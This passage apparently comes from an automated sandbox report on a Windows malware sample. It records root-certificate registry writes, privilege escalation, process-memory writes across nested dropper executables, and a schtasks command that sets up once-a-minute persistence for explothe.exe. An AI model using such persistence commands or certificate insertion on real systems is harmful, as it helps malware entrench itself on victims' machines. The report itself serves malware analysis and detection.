ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e4030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E4AB.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\E91F.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 1648 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2860 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2584 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2752 wrote to memory of 2424 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2192 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2424 wrote to memory of 2516 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2752 wrote to memory of 304 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 2584 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1812 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CD8C.exe
PID 1204 wrote to memory of 1344 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\CE77.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe

C:\Users\Admin\AppData\Local\Temp\CD8C.exe

C:\Users\Admin\AppData\Local\Temp\CD8C.exe

C:\Users\Admin\AppData\Local\Temp\CE77.exe

C:\Users\Admin\AppData\Local\Temp\CE77.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CF91.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe

C:\Users\Admin\AppData\Local\Temp\D32A.exe

C:\Users\Admin\AppData\Local\Temp\D32A.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe

C:\Users\Admin\AppData\Local\Temp\D50F.exe

C:\Users\Admin\AppData\Local\Temp\D50F.exe

C:\Users\Admin\AppData\Local\Temp\D6C4.exe

C:\Users\Admin\AppData\Local\Temp\D6C4.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

